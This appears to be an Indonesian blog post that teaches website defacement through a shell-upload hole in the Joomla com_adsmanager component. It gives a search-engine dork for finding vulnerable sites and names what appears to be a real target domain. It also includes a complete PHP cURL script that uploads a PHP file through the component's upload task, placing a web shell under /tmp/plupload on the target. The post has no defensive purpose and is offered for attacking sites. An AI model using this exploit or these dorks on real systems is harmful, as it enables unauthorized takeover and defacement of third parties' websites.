Hallo
Default dork : "com_adsmanager" site:sak karepmu
Exploit :synchronizer.co .li/index.php?option=com_adsmanager&task=upload
Vuln: ada tulisan anu
Default dork : "com_adsmanager" site:sak karepmu
Exploit :synchronizer.co .li/index.php?option=com_adsmanager&task=upload
Vuln: ada tulisan anu
$url = "http://annam.ganteng/index.php?option=com_adsmanager&task=upload"; // put URL HereShell acces : target/tmp/plupload/shell.php
$post = array
(
"file" => "@haha.jpg",
"name" => "haha.php");
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
0 Response to "Deface dengan Exploit Joomla Com_Adsmanager Shell Upload"
Posting Komentar